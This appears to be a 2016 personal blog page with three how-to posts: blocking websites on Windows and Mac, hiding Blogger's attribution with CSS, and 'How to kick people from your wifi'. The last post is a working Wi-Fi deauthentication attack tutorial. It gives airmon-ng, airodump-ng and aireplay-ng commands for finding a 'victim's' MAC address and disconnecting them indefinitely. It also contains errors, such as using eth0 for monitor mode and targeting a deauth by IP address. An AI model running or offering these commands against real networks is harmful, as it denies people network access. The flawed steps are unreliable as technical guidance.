Saturday, July 9, 2016

How to block a website on PC and Mac

How to block a website on PC and Mac


Ways to Blocking a Website on a PC
  1. Open the "Control Panel" by click "My Computer" on your PC
  2. Find the "Security Center" and click to open it.
  3. A window should appear and at the bottom where it says,"Manage Security settings for:"Find and choose "Internet Options".
  4. A window should appear and there should be a box at the top; click on "Restricted sites". Then click on sites.
  5. And there should be an area where you can type what site you want to enter.
  6. Type the site you want to block, click add. The site you added will be not opened on this computer


Ways to Blocking a Website on a Mac

Open the "System Preferences" panel --- Click to open "Parental Controls"(If you have multiple user accounts enabled, you will be able to choose the account that you wish to apply restrictions to. Enter a password if necessary.) --- Click "Enable Parental Controls" --- Locate the "Content" tab --- Select the type of restrictions that you would like to enable.

If you want Safari to block access to pornographic or other adult sites automatically, choose "Try To Limit Access To Adult Websites Automatically".
If you want to create a list of acceptable sites, select the option to "Allow Access To Only These Websites". Then enter the names of the websites that you want to allow Safari to access on the table provided.
When you are finished, exit Parental Controls/System Preferences and your changes will automatically be saved. Safari web browser will only allow access to the websites that you have specified.

How to Remove Powered by Blogger Attribution

How to Remove Powered by Blogger Attribution

Step 1:   Go to Blogspot Dashboard  Go to Template → Edit Html


how to remove powered by blogger attribution widget


Step 2:   Click anywhere in the code editor and Press CTRL+F to find

Step 3:   Now copy and paste this code in the Search Box then press Enter
    </head>
Step 4:   Copy this code and Paste just immediately before </head>:
<style> 
#attribution1{
display: none; }
</style>
Step 5:   Now click on “Save Template”.

Now Enjoy Your Time!!

Friday, July 8, 2016

How to kick people from your wifi

How to kick people from your wifi

Now I'm going to show you how to kick people from your internet wifi.

Step 1: Airmon-Ng
open up a terminal and type airmon-ng start wlan0 (or eth0 if your using Ethernet.) (Some times you might have to type airmon-ng check kill)

Step 2: Airodump-Ng
Next type airodump-ng wlan0 then find your Internet copy its bssid then type airodump-ng --bssid (your bssid) wlan0. It will show your victims mac.

Step 3: Aireplay-Ng
Now if you know their IP address you don't need to use airodump-ng.
If you know their ip address you can type aireplay-ng --deauth 0 -a (networks bssid) -k (Their ip address)
If your going to use their mac address type this aireplay-ng --deauth 0 -a (networks bssid) -c (Their mac address)
The 0 in Deauth 0 means keep deauth them until you stop it with CTRL C.

Hope you enjoyed this tutorial if you need help just comment whats wrong and I will get back to you as fast as possible.